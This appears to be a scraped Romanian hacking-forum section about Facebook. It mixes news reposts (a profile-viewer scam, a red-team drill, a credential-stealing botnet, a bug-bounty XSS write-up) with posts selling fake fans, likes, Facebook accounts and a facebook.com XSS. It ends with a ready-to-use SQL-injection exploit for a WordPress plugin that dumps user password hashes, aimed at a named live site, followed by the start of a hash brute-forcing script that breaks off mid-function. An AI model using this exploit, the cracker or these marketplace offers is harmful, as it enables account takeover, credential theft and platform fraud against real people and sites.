Search the Community

Vand fani reali in proportie de 98 % romani. 1000 - 9 euro 2000 - 17 euro 3000 - 25 de euro 4000 - 34 de euro 5000 - 42 de euro Preturile sunt fixe nu se negociaza nimic nu ofer fani de proba nu trimit fani pana nu am primit bani in concluzie prima data primesc bani iar apoi va dau fani. Toti fani sunt de pe diferite site-uri de filme,it,muzica,etc...ei sunt romani si sunt 100 % reali nu sunt boti sau ceva de genu. Timpul de livrare al comenzi nu il pot spune cu precizie pentru ca sunt diferite aspecte cum ar fi alte comenzi inainte sau problele de natura tehnica.Este si normal ca eu vreau sa trimit fani intr-un timp cat mai repede posibil asta doreste ori ce client,dar nu tot timpul se poate,ideea e ca fani sunt livrati in cel mai scurt timp posibil. Eu vand fani nu timp!!! Metode de plata : Paypal / Transfer bancar / Western Union.

Un nou virus de Facebook ia amploare in Romania. Iti promite ca iti arata cine ti-a vazut profilul Multi utilizatori din Romania s-au plans de acest scam in weekend. Un nou scam aparut pe Facebook ii indeamna pe romani sa dea click pe un link ca sa vada cine le-a vizualizat profilul. Din pacate, toti curiosii care au facut asta, s-au trezit cu contul infectat. Aceasta amenintare s-a extins puternic in weekend in Romania. Specialistii in securitate informatica sustin ca astfel de scamuri sunt vechi, insa cu toate acestea numarul celor care pica in plasa ramane ridicat. Ei mai spun ca nicio aplicatie de la Facebook nu iti permite sa vezi persoanele care iti vizualizeaza informatiile trecute in profil. Prin urmare, toate postarile care iti promit asa ceva sunt false. “Nicio aplicatie legitima de Facebook nu le permite utilizatorilor sa vada cine le vizualizeaza profilul. Acest scam duce la o frauda care, dupa nenumarate sondaje, ii redirectioneaza pe utilizatori catre premii false cu telefoane de ultima generatie. Escrocherii de acest gen circula de ani de zile in retelele sociale, dar continua sa faca victime printre utilizatori, indiferent de experienta sau varsta. Ele se bazeaza pe mecanisme de inginerie sociala si pe stimuli psihologici care ii provoaca pe oameni sa dea repede click, fara sa se gandeasca la consecinte. Cine nu isi doreste un premiu in schimbul unui singur like pe Facebook? Scamul fura Token-urile de acces (access tokens) ale unei aplicatii legitime de fotografii, apoi posteaza in numele utilizatorilor, accesandu-le datele personale. Aplicatia periculoasa se raspandeste usor printre prietenii victimei, care sunt etichetati automat la postarea mesajului. Bitdefender blocheaza linkul periculos, pe care l-a marcat ca frauda”, spune Catalin Cosoi, Chief Security Strategist la Bitdefender Romania. Surs?: Un nou virus de Facebook ia amploare in Romania. Iti promite ca iti arata cine ti-a vazut profilul - www.yoda.ro

Va recomand sa cititi stirea de mai jos chiar daca e lunga. How do companies prepare for the worst? By exposing workers to lifelike crises. Early on Halloween morning, members of Facebook's Computer Emergency Response Team received an urgent e-mail from an FBI special agent who regularly briefs them on security matters. The e-mail contained a Facebook link to a PHP script that appeared to give anyone who knew its location unfettered access to the site's front-end system. It also referenced a suspicious IP address that suggested criminal hackers in Beijing were involved. "Sorry for the early e-mail but I am at the airport about to fly home," the e-mail started. It was 7:01am. "Based on what I know of the group it could be ugly. Not sure if you can see it anywhere or if it's even yours." Facebook employees immediately dug into the mysterious code. What they found only heightened suspicions that something was terribly wrong. Facebook procedures require all code posted to the site to be handled by two members of its development team, and yet this script somehow evaded those measures. At 10:45am, the incident received a classification known as "unbreak now," the Facebook equivalent of the US military's emergency DEFCON 1 rating. At 11:04am, after identifying the account used to publish the code, the team learned the engineer the account belonged to knew nothing about the script. One minute later, they issued a takedown to remove the code from their servers. With the initial threat contained, members of various Facebook security teams turned their attention to how it got there in the first place. A snippet of an online chat captures some of the confusion and panic: Facebook Product Security: question now is where did this come from Facebook Security Infrastructure Menlo Park: what's [IP ADDRESS REDACTED] Facebook Security Infrastructure Menlo Park: registered to someone in beijing… Facebook Security Infrastructure London: yeah this is complete sketchtown Facebook Product Security: somethings fishy Facebook Site Integrity: which means that whoever discovered this is looking at our code If the attackers were able to post code on Facebook's site, it stood to reason, they probably still had that capability. Further, they may have left multiple backdoors on the network to ensure they would still have access even if any one of them was closed. More importantly, it wasn't clear how the attackers posted the code in the first place. During the next 24 hours, a couple dozen employees from eight internal Facebook teams scoured server logs, the engineers' laptop, and other crime-scene evidence until they had their answer: the engineer's fully patched laptop had been targeted by a zero-day exploit that allowed attackers to seize control of it. This is only a test The FBI e-mail, zero-day exploit, and backdoor code, it turns out, were part of an elaborate drill Facebook executives devised to test the company's defenses and incident responders. The goal: to create a realistic security disaster to see how well employees fared at unraveling and repelling it. While the attack was simulated, it contained as many real elements as possible. The engineer's computer was compromised using a real zero-day exploit targeting an undisclosed piece of software. (Facebook promptly reported it to the developer.) It allowed a "red team" composed of current and former Facebook employees to access the company's code production environment. (The affected software developer was notified before the drill was disclosed to the rest of the Facebook employees). The PHP code on the Facebook site contained a real backdoor. (It was neutralized by adding comment characters in front of the operative functions.) Facebook even recruited one of its former developers to work on the team to maximize what could be done with the access. The FBI e-mail came at the request of Facebook employees in an attempt to see how quickly and effectively various employee teams could work together to discover and solve the problems. "Internet security is so flawed," Facebook Chief Security Officer Joe Sullivan told Ars. "I hate to say it, but it seems everyone is in this constant losing battle if you read the headlines. We don't want to be part of those bad headlines." The most recent dire security-related headlines came last week, when The New York Times reported China-based hackers had been rooting through the publisher's corporate network for four months. They installed 45 separate pieces of custom-developed malware, almost all of which remained undetected. The massive hack, the NYT said, was pursued with the goal of identifying sources used to report a story series related to the family of China’s prime minister. Among other things, the attackers were able to retrieve password data for every single NYT employee and access the personal computers of 53 workers, some of which were directly inside the publisher's newsroom. As thorough and persistent as the NYT breach was, the style of attack is hardly new. In 2010, hackers penetrated the defenses of Google, Adobe Systems, and at least 32 other companies in the IT and pharmaceutical industries. Operation Aurora, as the hacking campaign came to be dubbed, exploited zero-day vulnerabilities in Microsoft's Internet Explorer browser and possibly other widely used programs. Once attackers gained a foothold on employee computers, they used that access to breach other, more sensitive, parts of the companies' networks. The hacks allowed the attackers to make off with valuable Google intellectual property and information about dissidents who used the company's services. It also helped coin the term "advanced persistent threat," or APT, used to describe hacks that will last weeks or months targeting a specific organization that possesses assets the attackers covet. Since then, reports of APTs have become a regular occurrence. In 2011, for instance, attackers breached the servers of RSA and stole information that could be used to compromise the security of two-factor authentication tokens sold by the division of EMC. A few months later, defense contractor Lockheed Martin said an attack on its network was aided by the theft of the confidential RSA data relating to its SecurID tokens, which some 40 million employees use to access sensitive corporate and government computer systems. "That was the inspiration around all this stuff," Facebook Security Director Ryan "Magoo" McGeehan said of the company's drills. "You don't want the first time you deal with that to be real. You want something that you've done before in your back pocket." Even after employees learned this particular hack was only for practice—about a half hour after the pseudo backdoor was closed—they still weren't told of the infection on the engineer's laptop or the zero-day vulnerability that was used to foist the malware. They spent the next 24 hours doing forensics on the computer and analyzing server logs to unravel that mystery. "Operation Loopback," as the drill was known internally, is notable for the pains it took to simulate a real breach on Facebook's network. "They're doing penetration testing as it's supposed to be done," said Rob Havelt, director of penetration testing at security firm Trustwave. "A real pen test is supposed to have an end goal and model a threat. It's kind of cool to hear organizations do this." He said the use of zero-day attacks is rare but by no means unheard of in "engagements," as specific drills are known in pen-testing parlance. He recalled an engagement from a few years ago of a "huge multinational company" that had its network and desktop computers fully patched and configured in a way that made them hard to penetrate. As his team probed the client's systems, members discovered 20 Internet-connected, high-definition surveillance cameras. Although the default administrator passwords had been changed, the Trustwave team soon discovered two undocumented backdoors built into the surveillance cameras' authentication system. Havelt's team exploited the backdoors to remotely take control of the cameras. With the ability to view their output, change their direction, and zoom in and out, the Trustwave employees trained them on computer keyboards as employees in the unidentified company entered passwords. With the help of the cameras' 10x zoom, the pen testers were able to grab a "ton" of credentials and use them to log in to the company's network. From there, the employees escalated privileges to gain administrative control of the network. (The employees later reported the vulnerability to the camera manufacturer, resulting in the eventual release of this security advisory.) We "ended up with domain admin on the internal network just because [the client] left these cameras on the Internet," Havelt said during a talk at last year's RSA conference. Havelt recalled a separate engagement in the last 12 months that involved a different client. After his team gained access to a system that was on the company's internal network, the hired hackers injected malicious code into webpages regularly accessed by the company's developers. The malicious Java applet exploited a recently discovered vulnerability in the Java software framework that Oracle had yet to patch. With full access to one of the developer's machines, the payload installed a new set of cryptographic keys that was authorized to access the company's servers using the SSH, or secure shell protocol. With that significant toehold established, the pen testers were able to escalate their control over the client's network. Adriel Desautels, CEO of pen testing firm Netragard, is also no stranger to the use of zero-day exploits, although he said he's often able to infect his clients using less sophisticated methods. During a recent engagement for a sensitive governmental agency located in the US, for instance, his team used social engineering to trick an agency employee into clicking on a link. The link, unbeknownst to the employee, installed "Radon," which is the name of pseudo-malware designed by Netragard to allow employees the same kind of sophisticated access many state-sponsored hackers behind espionage campaigns have. With the employee's desktop computer infected, Radon rummaged through the agency's network and added malicious commands to the "batch file" every computer ran when it logged in. The modified file caused each computer to also become infected with Radon. Seizing control of hundreds of independent machines gave the Netragard hackers a higher likelihood of maintaining persistence over the network, even in the event that the initial infection was discovered and cleaned up. "Eventually, it was game over," Desautels told Ars. "We had more control over their network than they did. That's how you do it. You don't just infect one system and stick it in their network and then try to infect the company. That doesn't guarantee you're going to be successful." Desautels praised the architects of Operation Loopback because Facebook "did more than most other companies in this industry will do." But he went on to say that the engagement was significantly more limited than most attacks waged by well-funded and experienced hackers who are intent on penetrating a Fortune 500 company. "If this were a real attack, they probably would have gone after multiple employees, especially with a zero day," he explained. "Why target one user when you have potentially hundreds of users you can target and get hundreds of points of entry?" Facebook, he continued, "probably got some good insight. But [the engagement] is not nearly as realistic as it would be if it was a nation-state attack just because [Operation Loopback] was very singular." Stress testing Facebook's incident response To be fair, the drill Facebook executives devised wasn't intended to replicate every characteristic of a real-world attack. Instead, the executives wanted to develop employees' ability to work together to respond to an attack that could have a catastrophic effect on the site's security. Sullivan, Facebook's CSO, calls it a "stress test" of his incident response team. "The team had grown substantially in the prior year, and we wanted to see if everyone is going to start screaming at each other or blaming each other because 'your logging system broke,' or 'your automated alerting should have triggered over here.' That was the human side of the test." Operation Loopback also wasn't the first drill to test employees' ability to respond effectively in times of crisis. Six months earlier, McGeehan, the company's security director, installed a host of powerful hacking tools on a laptop computer, connected it to the Facebook internal wireless network, and stashed it behind a supply cabinet in a public hallway. A few days later, employees with the company's physical security team reported the discovery of the mysterious laptop to the security team, touching off another tense response. Over the following day, employees scouring server logs found the computer's MAC, or media access control, address had accessed key parts of Facebook's network. "The first thing is: 'Oh my God. Panic,'" McGeehan said as he recalled his team's response to the incident. For almost 24 hours, the situation gave most employees every indication of being real. "As we're dealing with this, we realize that our network has been intruded on by some bad guy. Everyone in this room [is] thinking about 'how are we going to tear down our entire network? How are we going to basically deal with the worse-case scenario as a security incident?" To ratchet up the stress even further, the drill organizers sent an e-mail to members of Facebook's security team a few hours after the laptop was disconnected from the Facebook network. The e-mail purported to come from members of what's known as the Koobface Gang, whose members last year were identified as the perpetrators of virulent malware that spread over the social networking site. It made a series of demands of Facebook and promised serious reprisals if they weren't met. With Project Vampire, as the drill was dubbed, the employees worked a full 24 hours before they learned it wasn't a real hack. "We felt it was a necessary thing to have a great security team to put them through this kind of stuff," Sullivan explained. The organizers made an exception, however, when early in the drill, an employee said the magnitude of the intrusion he was investigating would require him to cancel a vacation that was scheduled to begin the following week. McGeehan pulled the employee aside and explained it was only a drill and then instructed him to keep that information private. Drills that use real zero-day vulnerabilities, require outside penetration testing firms, and suck up hundreds or thousands of man hours on non-production activities are expensive to carry out. But in a post-Operation Aurora world, where companies as security-savvy as Google and RSA are hacked and ransacked of valuable data, it is becoming increasingly necessary. "These things used to be unheard of when back when, except for governmental type organizations," Trustwave's Havelt said. "Now, you're seeing this more in the private sector. It's good to see. If it were any other industry and it was any other critical function of a product not doing this you'd have people screaming that [the companies] were negligent and wanting to sue them left and right." Sursa: At Facebook, zero-day exploits, backdoor code bring war games drill to life | Ars Technica Via: Digg - What the Internet is talking about right now

PokerAgent botnet was discovered in 2012 by ESET Security Research Lab, which is a Trojan horse designed to harvest Facebook log-on credentials, also collecting information on credit card details linked to the Facebook account and Zynga Poker player stats. According to latest report, the botnet is still active mostly in Israel and 800 computers were infected, where over 16194 Facebook credentials stolen. The Trojan is active with many variants and belongs to MSIL/Agent.NKY family. ESET reveal that, the Trojan is coded in C# language and easy to decompile. After deep analyse, team found that the bot connects to the C&C server. On command, Trojan access the Facebook account of victim and collects the Zynga Poker stats and number of payment methods (i.e. credit cards) saved in the Facebook account. Once collected, information sent back to the C&C server. The Trojan is downloaded onto the system by another downloader component. This downloader component was seen on the web and the victims have been fooled into downloading it. ESET tracking of the botnet revealed that at least 800 computers have been infected with the Trojan and that the attacker had at least 16194 unique entries in his database of stolen Facebook credentials by March 20, 2012. "We advise careful consideration before allowing a browser or other app to ‘remember’ passwords for sensitive services and before storing credit card details into any application (not only Facebook!)." ESET advice. Via PokerAgent botnet stole over 16,000 Facebook credentials - Hacking News

Facebook today announced that it has opened registration for the Hacker Cup, its annual competition for programmers with a $10,000 top prize, up from $5,000 last year, for the best of them all. Facebook holds the Hacker Cup in rounds, starting first online and then culminating in a final onsite round at Facebook’s HQ in Menlo Park, CA for the top 25 programmers. This years preliminary rounds will be held between January 25 and February 16. Facebook will fly the top 25 for the onsite final round that takes place March 22-23. The Hacker Cup is important for a couple of reasons. For one is shows that, although Facebook is pushing past one billion members of its social network and is now one of the world’s biggest public tech companies, it is committed to trying to staying close to its Hacker Way roots. This is important for it to stay innovative, but it also helps keep Facebook in touch with the world community of top, smart programmers — an obvious route to tapping for top engineering talent. Facebook says that those who registered for a previous year are automatically registered for the competition year, although they still need to check their information is up-to-date. There is no limit to the number of people registering for the competition, as long as you sign up by the end of the first round, on the 27th of January. But there are a few limits on who can participate. Facebook notes in its rules and regulations that you need to be registered on Facebook yourself, you need to be 18 or older, and you cannot be resident in Quebec (!) or any other place where these kinds of competitions are prohibited by law. You also need to provide your real name, postal address, phone number, email address, and date of birth, which may weed out a few Anonymous types, as brilliant as some of them may be. The competition will follow the same form as in past years. Rather than free-form hackathon-style hacking, contestants are given problem sets that they need to solve. Answers come by way of source code and an output file to show how it works. They will be judged on how well they can come up with the solution in a set period of time, via a timer in the input set. They have six minutes to submit the source code and output file — and they can submit multiple answers in that time. Last year, the Hacker Cup attracted 8,000 hopefuls from 150 countries, but the final 25 came from a relatively narrow list of countries – Russia, Germany, Poland, Ukraine, China, South Korea, Japan, Taiwan, and the U.S., with the winner, Roman Andreev, hailing from Russia. You can read more about him and last year’s competition here. Just as it is telling that Facebook runs a Hacker Cup, it will be telling to see how many enter this year and how the country spread for finalists compares. Register FAQ Source

This guy recently found a Stored XSS on Facebook worth 3500USD dollars. This is his story how he did it: I was actually working on finding flaws on Dropbox to begin with. I noticed that when using their web interface there were some restrictions on what filenames that were allowed. If you tried to rename a file to for example: '"><img src=x onerror=alert(document.domain)>.txt it was not possible. You got this error: The following character are not allowed: \/:?*<>"| But, if you instead, connected a local directory, created a file there and synced it, you got it inside Dropbox without any problems. Using this method I was able to find two issues with their notification messages showing unescaped filenames. I reported these issues to Dropbox, they patched it really fast and I was placed on their Special Thanks page for the responsible disclosure. It didn’t end here. As I was testing out this stuff on Dropbox, I also tried to figure out how this issue could be connected with other services. I noticed their Facebook-connection and got curious on how it worked. It turned out that they had a pretty nice function going on there: “Dropbox has teamed up with Facebook so that you can do cool things like add files from Dropbox to your Facebook groups or send shared folder invitations to your Facebook friends.” Nice! I created a group, and found the connection using the “Add File” icon on the Group wall: I selected the file that I synced to Dropbox, it was called: '"><img src=x onerror=alert(document.domain)>.txt and shared it. Nothing awesome happened except the file being shared. But then, I clicked the Share-link on the entry. BAM! The title of the entry was not escaped correctly and I was able to get the Stored XSS triggered. By using the files in my Dropbox I could inject script code that was executed on Facebook.com. I reported this to Facebook directly using their Whitehat Vulnerability Reporting system, told them it was an urgent issue and how I managed to get it executed. The issue was at that time only affecting the Share-popup inside the Group page and could only be triggered by user interaction, serious or not, it was clearly not affecting all users on Facebook. At the same time I started looking on the URL of this Share-popup: https://www.facebook.com/ajax/sharer/?s=44&appid=210019893730&p%5B0%5D=entry_id&p%5B1%5D=user_that_shared_it_first This URL did not work if you tried it stand-alone. That was good, the XSS issue looked like it could only be triggered by user interaction. But then I started googling and found that you were able to create a Share-URL by using this format: https://www.facebook.com/sharer/sharer.php? So I changed my URL to that format: https://www.facebook.com/sharer/sharer.php?s=44&appid=210019893730&p%5B0%5D=entry_id&p%5B1%5D=user_that_shared_it_first BAM again! If you were logged in into Facebook, the code was executed as soon as you visited the link. Bad. Really bad. I emailed Facebook again, explaining that you could actually trigger the XSS by only visiting a link. I was also trying out if I could get other services to behave in the same way. Dropbox and Facebook had this special connection, so I was curious if this issue was isolated or if I could reproduce it by using another service. Went to Pinterest. Created a Pin named: '"><img src=x onerror=alert(document.domain)> and shared it on Facebook using my test account. I pressed the Share button on it. I was amazed – it had the same issue. Facebook replied to me, asking me how I was able to place the files on Dropbox with that filename. I explained how this was done and also told them that the service that you shared from didn’t matter, it was a general issue with the escaping that created a vulnerable vector on the Share-page. They responded and said that it was indeed the same issue and they should look into it ASAP. In the meantime, I tried the link on different devices. My iPhone could not get the XSS executed. As soon as I visited the page, I was redirected to https://m.facebook.com and that page did not have the same issue. But I also realized that you could force Facebook to skip the redirect by using a parameter called m2w, so if I appended that to the URL: https://www.facebook.com/sharer/sharer.php?s=44&appid=210019893730&p%5B0%5D=entry_id&p%5B1%5D=user_that_shared_it_first&m2w I was able to trigger the URL on both mobile devices and on desktop. Another email to Facebook. One day after that I noticed that the POC-link did not work anymore, it was finally patched. I told them I could not reproduce it anymore and it looked like it was fixed. One day later I got this email: Source: Detectify Blog – How I got a $3,500 USD Facebook Bug Bounty

Traficanti.ro Un site creeat pentru devoratorii de trafic, webmasterii care vor mai mult trafic si pentru cei care vor sa faca un ban in +. Cu ajutorul site-ului Traficanti.ro poti primi urmatoarele: LIKE-uri Facebook, Urmaritori Twitter, Vizionari pentru Video Youtube, Google +1, Vizite pe site-ul tau personal si Bani de buzunar. Traficanti.ro te plateste sa vizitezi site-uri, primesti $0.01 pentru fiecare site pe care il vizitezi in auto-surf, la inregistrare primesti un BONUS de $0.20. + 50 de monede pentru ati promova propriul site. (1) Ce este acest site? Acest site este un sistem de schimb care va ajuta sa cresteti traficul si popularitatea site-ului vostru. (2) Ce sunt monedele? Monezile sunt puncte pe care le primiti pentru orice activitate de pe acest site. (3) Ce pot face cu monedele? Monezile se pot transforma in notari pe Google+, fani pe Facebook, urmaritori pe Twitter, vizualizari pe YouTube sau accesari pe site. (4) Cum castig monede? Monezile se pot castiga la fiecare notare, apreciere, urmarire, vizualizare a unei adrese de la un alt utilizator. (5) Cum pot castiga bani? Poti castiga bani prin auto-surf sau prin a aduce persoane pe site prin link-ul tau personal. Folositi acest cupon pentru un BONUS de 100 Monede: rst-center-forum (valabil pentru primele 100 persoane)

Cel mai tare site de like-uri, este un fel de like Exchange, intri, iti faci cont, iti adaugi pagina de facebook ( la care vrei sa primesti clikuri ) alegi o suma cat oferi pt un like, si apoi te apuci sa dai tu like-uri, pt fiecare like pe care il dai primesti un anumit nr de puncte, care intra in contul tau. De ex tu daca ai cerut pe like-ul tau 10 Coints , si tu ai castigat 50 Coints atunci ai sa primesti 5 like-uri, aici depinde cat esti de harnic poti face si 1000 pe zi, sau poti folosii un autocliker. http://addmefast.com/?ref=PMZ7B http://addmefast.com/ Binenteles, pt atata efort n-ar strica sa intrati de pe reffer

500 - 5 USD 1000 - 10 USD 2000 - 20 USD 100% USERI REALI Oferte aici sau pe pm Plata: Paypal

Am nevoie urgent de cineva care sa-mi faca 2 aplicatii de facebook gen: facebook.com/Like2Watch "ce motor ti se potriveste" , "vei vedea fantome" , astept PM cu oferte.

Mai multe fotografii, la care nu aveau acces decât prietenii cei mai apropia?i ai lui Mark Zuckerberg, au putut fi accesate ?i v?zute de toat? lumea, dup? ce un hacker a reu?it s? sparg? contul ?efului Facebook. Reprezentan?ii re?elei de socializare spun c? hackerul a profitat de o sc?pare a sistemului, care îns? a fost remediat? între timp. În fotografiile f?cute publice pe internet se poate vedea o parte din via?a privat? a lui Mark, al?turi de iubita sa, Priscilla Chan. Cei doi g?tesc împreun?, merg la restaurant, sau stau acas? al?turi de prietenii apropia?i. Mai mult, au ap?rut fotografii ?i de la cele mai importante întâlniri ale lui Mark - printre ele fiind cea cu pre?edintele american Barack Obama. Sursa: http://www.antena3.ro/externe/cat-de-sigur-este-facebook-contul-lui-mark-zuckerberg-a-fost-spart-de-hackeri-vezi-poze-private-cu-el-si-iubita-146812.html

Dupa cum zice si titlul dau la schimb un cont de steam cu counter-strike 1.6 pe 5 conturi de facebook care sa aiba peste 2000 de prieteni fiecare. Cine e interesat sa imi dea mp sau sa lase un reply. Ii rog pe cei care nu au treaba cu topicul sa se abtina de la comentarii inutile.

Am nevoie de foarte multe like-uri pentru o pagina de facebook urgent, PM cu oferte. Cumpar conturi de facebook cu multi prieteni urgent, PM cu oferte.

XSS in facebook.com Pret 100$ (350lei) WU, PP Dovada la moderatori sau dupa ce vad banii. PM. Si 1K+ db-uri .FR

Social networking phenomenon Google+ (or Google Plus), whose early growth has been meteoric, has finally hit turbulence - Web analytic firm Experian Hitwise said the site witnessed a drop in traffic growth and average usage time - but it still poses a threat to Facebook. Google+ launched on June 28 and, despite being in the beta phase, grew at a blistering pace and hit the 20 million member mark in its first three weeks, according to data released last week by comScore. Earlier this week, Hitwise reported that visits to Google+ had soared 283 percent for the week ending July 16 compared to the week before and 821 percent for the week ending July 9 compared to the week before that. Google+, it seemed, had only one aim - to be the best social networking site and it was well headed in that direction. No wonder, Google CEO Larry Page was boastful: "We want to make products that everybody uses twice a day, like their toothbrush." And indeed, everybody from private individuals to the largest of the business corporations wanted a piece of action on Google+. However, what happened next was unexpected. Google+ began to boot businesses from the site and urged users to use their real name for Google+ accounts or risk being deleted. Not surprisingly, it resulted in a rush of complaints - while some businesses felt Google+ is ignoring the needs of the corporate, others felt Google+ was indulging in favoritism it said it will select a limited number of business partners for a test period following which it will "have an initial version of businesses profiles up and running for EVERYONE." However, businesses were not the only ones to complain of Google's policy. When Google said Google+ users must furnish their real names or risk account deletion, some users said they used their real name and had their account deleted anyway, while others said they should be able to use a pseudonym to protect their privacy. The controversies as well as the fact that users aren't too happy with Google+'s aura of exclusivity (currently people are allowed to use the site on 'invite-only' basis) as a critical mass of their friends and contacts aren't on it yet, not surprisingly tarnished Google+'s halo and user's ire/frustration translated in a drop of traffic and usage activity last week. For the week ended July 23, Google+ received only 1.79 million visits (down 3 percent compared to previous week) and the average time spent on the site was also down 10 percent, compared to previous week, to 5 minutes and 15 seconds. Though Hitwise didn't offer any explanation for the drop in numbers, it suggested that Google+, which witnessed a dream start, has finally crash-landed. And, to make matter worse, Facebook quietly attempted to poach on businesses that are dissatisfied with Google+'s decision, by releasing Facebook for Business that teaches companies how to grow their businesses using Facebook's "powerful marketing tools" including Facebook Pages and Facebook Ads. "Business owners can learn best practices for creating a Page and engaging customers in a two-way conversation to answer questions, get valuable feedback, and to reach their friends," a Facebook spokesperson wrote. However, by no means, the traffic slump indicates the end of Google+. Though currently a fledgling social network compared to Facebook, Google+ is perhaps the biggest threat Facebook has ever faced and there are seven reasons why: Best Facebook Rival: According to Search Engine Land's founder Sullivan, Google is "the only company well positioned to launch a Facebook alternative." "People like alternatives. Twitter doesn't offer a full-fledged alternative to the Facebook experience. Google does," he said. Indeed, Google+ offers one of the best social networking experience. Google+ offers one-stop-shop social networking experience for people who want to link up with friends and family, but don't like using multiple sites. According to technology analyst Rob Anderle, "Google+ has aspects of Twitter, Facebook and LinkedIn in it, and folks are a bit overwhelmed with all of the different social networking services." "Folks have also crammed these other services with tons of 'friends' they don't really know, and the sheer volume of activity has weakened the quality of the experience," Enderle told ABC News in an email. That's true. Facebook is for family and friends, LinkedIn is for professionals and Twitter is for micro-blogging. The experience could turn out to be quite overwhelming but Google+ could be the perfect solution for it offers various ways to connect to your friends, family and more - through video, SMS, etc - while at the same time boasting of privacy and content-sharing features that are better and easier to use than Facebook's. Circles: Google+ Circles offers a simple means of organizing one's social network by grouping contacts into anything you can possibly imagine - family, friends, co-workers, etc and sharing content with the customized groups. Thanks to Circles, users can group their contacts under specific names such as Family, Friends, Acquintances, Co-workers, in fact, anything at all. In other words, Circles will allow Google+ users to focus on the things a subset of the profile's contacts are interested in and will help it to separate the signal from the noise. Circles, in fact, could be Google+'s biggest strength as neither Facebook nor Twitter allows you to group your contacts and both force users to share anything and everything they post with all their friends, with few options to control. On the other hand, Google+ allows users to share information with only those contacts or group of contacts they want to share with. Privacy Approach: Privacy issues have been Facebook and Twitter's bugbear for long. Anything posted up on Facebook or Twitter is displayed for the world to see, be it your family, your boss or even complete strangers, even as horror stories of contents not meant to be seen by family members, friends or co-workers continue to grow. However, Facebook has done little to address the issue and has adopted a cavalier attitude towards this. On the other hand, Google has attempted to circumvent this problem by introducing "data liberation" tool in Google+ which allows you to pack up and take your data away from Google+ should you decide to leave the service. If you want to leave Facebook, it's a Herculean task to export your data elsewhere. All you can do is delete your profile. Hangouts: Perhaps the greatest strength of Google+, the multiuser video conferencing tool allows up to 10 users to see and talk to one another at the same time. The one with the loudest voice gets the centerstage. Hangouts can be the future of webinars and it has already sparked users' imaginations about potential business use cases. Despite Facebook announcing the integration of Skype videoconferencing, nothing will be able to beat Hangouts, at least for now. Integration: A major strength of Google+ and its advantage over Facebook is integration. Almost all the existing Google online services, from Search and Documents to Email (Gmail) and Video, will be built into Google+ social networking features. It will allow the user to monitor all Google+ events in such a way so that the user never misses out on anything, anywhere, anytime. Search: Google's most powerful weapon is its unrivaled search engine, imitated by many but mastered by none. If Google integrates its own Google+ live feed Sparks with the Search service, it will blow away Facebook because though Facebook has had a huge headstart as a social network site BUT it has little or no penetration into the search market. With Facebook, a user must leave the site to find stuff to share or wait until their friends share it with them. On the other hand, with Sparks, you can get an instant fountain of relevant information to share with friends. Blistering Pace of Growth: If we take the latest figures from Hitwise to be an aberration, we cannot help but say that compared to Facebook, Google+ has been growing at a blistering pace. Facebook, which opened to the public in September 2006, had only 30 million subscribers by March 2007. The site, however, now has 750 million users. Moreover, within a short span of time Google+ has become the 42nd most-visited social networking site and the 638th most-visited site overall in the U.S, according to Hitwise. In fact, though traffic may have slowed down at Google+, Hitwise's Matt Tatham was careful not to overplay the findings and acknowledged, "this is not a huge drop." There could be three reasons why. Firstly, let's not forget that Google's decision to purge business accounts and fake names could have contributed to the losses. If Google addresses the issues, the problem will be solved. Secondly, Hitwise figures doesn't take into account visits through mobile apps or APIs i.e. any use of the Google+ app for iPhone or Android isn't being counted. And, given that the Google+ iPhone app launched last week and quickly rose to the top of the App Store rankings, there's a good chance that mobile users have easily made up for the losses that Hitwise is reporting. Thirdly, the figures are just for the USA does not include countries like India where Google+ has seen an uptick. In conclusion, it's too early to write off Google+. In fact, only an idiot will write off Google+ because the site is still in its beta phase and hasn't yet opened up to the public. Moreover, if Google+ had the trappings of its doomed predecessors like Google Wave and Google Buzz, the market cap of Google Inc.wouldn't have jumped by $45 billion since the launch of the site. And, given Google's powerful ecosystem of products and services and plenty of hype, Google+ will have no problem in attracting new registered users and converting them into returning visitors. The world needs a new social networking site, if the 20 million people who have joined Google+ is any indication, and "For people who love Google," said Sullivan, "it's like they've found a home where they can be loud and proud about the company." There is a very good chance Google+ will not only continue to survive but also it will thrive and unless Google truly messes it up in the next two years, it will become an unstoppable force and can be a threat to Facebook. Otherwise why would Facebook go on an overdrive to delete Google+ ads on its site or try to keep Facebook users from exporting Facebook contacts into Google+? Sursa Google+ Witnesses Traffic Slump but Still a Threat to Facebook: Seven Reasons Why.

Wordpress Sql Injection App : FBConnect WordPress Plugin Type : Sql-Injection Dork : inurl:"fbconnect_action=myhome" Exploit : ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users-- PoC : www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users-- Exemple: http://www.ariesdubs.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29kiddevilz,7,8,9,10,11,12+from+wp_users-- ok when you have the hash, md5 and enccode64() you can test a bruteforce whit this (python): # code by : tdxev # website : www.tdxev.com # team : www.insecurity.ro # version : 2011.01.17 # documentation : /wp-includes/class-phpass.php import md5 import time # user settings wpHashList = ["$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340"] # list of wordpress hashs #$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340 = tdxev charSet = 'abcdefghijklmnopqrstuvwxyz0123456789_-' # the character set that the script will use dumpFile = '/tmp/wp_crack_result.txt' # the file where the script will dump the result for each hash progFile = '/tmp/wp_crack_progress.txt' # the file where the script will keep track of progress made # app settings itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' # use by crypt_private def encode64 (textInput,count): output = '' i = 0 while i < count : i = i + 1 value = ord(textInput[i-1]) output = output + itoa64[value & 63] if i < count : value = value | ord(textInput[i]) << 8 output = output + itoa64[(value >> 6) & 63] i = i + 1 if i >= count: break if i < count: value = value | ord(textInput[i]) <<16 output = output + itoa64[(value >> 12) & 63] i = i + 1 if i >= count: break output = output + itoa64[(value >> 18) & 63] return output # generate wordpress hash def crypt_private (plainText, wordpressHash): output = '*0' # old type | not suported yet if wordpressHash[0:2] == output: output = '*1' if wordpressHash[0:3] != '$P$': # old type | not suported yet return output count_log2 = itoa64.find(wordpressHash[3]) # get who many times will generate the hash if (count_log2 < 7) or (count_log2>30): return output count = 1 << count_log2 # get who many times will generate the hash salt = wordpressHash[4:12] # get salt 